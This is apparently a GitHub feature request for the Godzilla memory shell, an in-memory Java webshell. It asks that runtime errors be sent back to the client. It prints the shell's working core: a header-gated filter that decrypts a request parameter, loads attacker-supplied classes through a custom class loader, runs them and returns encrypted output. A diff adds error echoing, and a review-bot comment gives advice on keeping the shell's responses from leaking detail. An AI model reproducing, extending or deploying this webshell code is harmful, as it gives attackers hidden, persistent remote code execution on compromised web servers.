Open
Labels: enhancement (New feature or request)
Description
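Currently, when the Godzilla shell hits a runtime error before it runs, no log is echoed back; for example, if the session cannot be obtained, there is no way to tell from the response.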
```java
try {
    if (request.getHeader(headerName) != null && request.getHeader(headerName).contains(headerValue)) {
        HttpSession session = request.getSession();
        byte[] data = base64Decode(request.getParameter(pass));
        data = this.x(data, false);
        Object cache = session.getAttribute(key);
        if (cache == null) {
            session.setAttribute(key, (new GodzillaFilter(Thread.currentThread().getContextClassLoader())).Q(data));
        } else {
            ByteArrayOutputStream arrOut = new ByteArrayOutputStream();
            Object f = ((Class<?>) cache).newInstance();
            f.equals(arrOut);
            f.equals(request);
            f.equals(data);
            f.toString();
            response.getWriter().write(md5.substring(0, 16));
            response.getWriter().write(base64Encode(this.x(arrOut.toByteArray(), true)));
            response.getWriter().write(md5.substring(16));
        }
        return;
    }
} catch (Throwable e) {
    e.printStackTrace();
}
```

Change it as follows, so that the runtime error log is passed straight to response.getWriter() and sent to the client; this makes it possible to identify compatibility problems with the memory shell.
try {
if (request.getHeader(headerName) != null && request.getHeader(headerName).contains(headerValue)) {
+ try {
HttpSession session = request.getSession();
byte[] data = base64Decode(request.getParameter(pass));
data = this.x(data, false);
Object cache = session.getAttribute(key);
if (cache == null) {
session.setAttribute(key, (new GodzillaFilter(Thread.currentThread().getContextClassLoader())).Q(data));
} else {
ByteArrayOutputStream arrOut = new ByteArrayOutputStream();
Object f = ((Class<?>) cache).newInstance();
f.equals(arrOut);
f.equals(request);
f.equals(data);
f.toString();
response.getWriter().write(md5.substring(0, 16));
response.getWriter().write(base64Encode(this.x(arrOut.toByteArray(), true)));
response.getWriter().write(md5.substring(16));
}
return;
+ }catch (Throwable e) {
+ e.printStackTrace(response.getWriter());
+ }
}
} catch (Throwable e) {
e.printStackTrace();
}
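
Review bot: the inner catch's `e.printStackTrace(response.getWriter())` writes the raw stack trace into the HTTP response in cleartext, while the success path only writes output wrapped by `this.x(..., true)` and `base64Encode`; the trace exposes the host application's class names and call stack to whoever sent the matching header, so error detail is better kept in the server-side log, as the outer `e.printStackTrace()` already does. Note also that `return;` is inside the inner try, so after this catch runs the method does not return at that point and execution continues past the outer try block.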